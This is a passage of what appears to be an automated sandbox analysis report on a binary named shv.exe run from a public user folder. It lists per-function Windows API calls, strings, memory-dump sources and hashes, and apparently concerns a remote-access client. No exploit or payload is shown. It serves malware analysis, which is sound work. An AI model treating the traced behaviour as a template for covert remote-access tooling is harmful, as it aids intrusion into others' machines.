                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,1B492F88,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                        • String ID: Client$DisableGeolocation
                                                                                        • API String ID: 3315423714-4166767992
                                                                                        • Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                        • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                        • Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
                                                                                        • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                        APIs
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                          • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                          • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                          • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                          • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                        • TranslateMessage.USER32(?), ref: 110271F0
                                                                                        • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                        • String ID: Exit Msgloop, quit=%d
                                                                                        • API String ID: 3212272093-2210386016
                                                                                        • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                        • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                        • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                        • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 110173FD
                                                                                          • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 1101733C
                                                                                          • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                          • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                          • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                          • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(000002FC,000000FF), ref: 11017252
                                                                                          • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                          • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                          • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
                                                                                        • SetEvent.KERNEL32(000002FC), ref: 1101741D
                                                                                        • GetTickCount.KERNEL32 ref: 11017423
                                                                                        Strings
                                                                                        • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                        • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                        • API String ID: 3804766296-4122679463
                                                                                        • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                        • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                        • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                        • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                        • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                        • String ID: *AutoICFConfig$Client
                                                                                        • API String ID: 3257255551-59951473
                                                                                        • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                        • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                        • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                        • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                        • String ID: Push
                                                                                        • API String ID: 1566154052-4278761818
                                                                                        • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                        • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                        • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                        • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                        APIs
                                                                                        • GetCommandLineA.KERNEL32 ref: 00F01027
                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00F0107B
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00F01096
                                                                                        • ExitProcess.KERNEL32 ref: 00F010A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4131565154.0000000000F01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F00000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4131549170.0000000000F00000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_f00000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                        • String ID:
                                                                                        • API String ID: 2164999147-0
                                                                                        • Opcode ID: dc1bb6903313550a2b9cb297aaffe469805179dbc7a0f2b8b801d5069d2dddec
                                                                                        • Instruction ID: 4e1141ea8c13dac032d09b9661698debac55257390806c8b258f6652198fa82a
                                                                                        • Opcode Fuzzy Hash: dc1bb6903313550a2b9cb297aaffe469805179dbc7a0f2b8b801d5069d2dddec
                                                                                        • Instruction Fuzzy Hash: 2611C060C083C85AEF315F6088887EABFA5BF023A0F240048EDD6961CAD25648C7F7B5
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                        • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 1314093303-0
                                                                                        • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                        • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                        • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                        • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                        • String ID: C:\Users\Public\Netstat\shv.exe
                                                                                        • API String ID: 2251294070-727063226
                                                                                        • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                        • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                        • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                        • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle
                                                                                        • String ID: \\.\NSWFPDrv
                                                                                        • API String ID: 3498533004-85019792
                                                                                        • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                        • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                        • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                        • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _calloc
                                                                                        • String ID:
                                                                                        • API String ID: 1679841372-0
                                                                                        • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                        • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                        • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                        • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                        • __wsplitpath.LIBCMT ref: 11111475
                                                                                          • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                        • String ID:
                                                                                        • API String ID: 1847508633-0
                                                                                        • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                        • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                        • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                        • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                          • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                          • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                          • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                          • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00B5F810,?,00000001,00000001), ref: 1109E9A3
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                        • String ID:
                                                                                        • API String ID: 2256153495-0
                                                                                        • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                        • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                        • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                        • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
APIs
• InitializeCriticalSection.KERNEL32(111F0908,1B492F88,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
• EnterCriticalSection.KERNEL32(111F0908,1B492F88,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
• LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_shv.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterInitializeLeave
• String ID:
• API String ID: 3991485460-0
• Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
• Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
• Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
• Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
APIs
• LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
Strings
Memory Dump Source
• Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
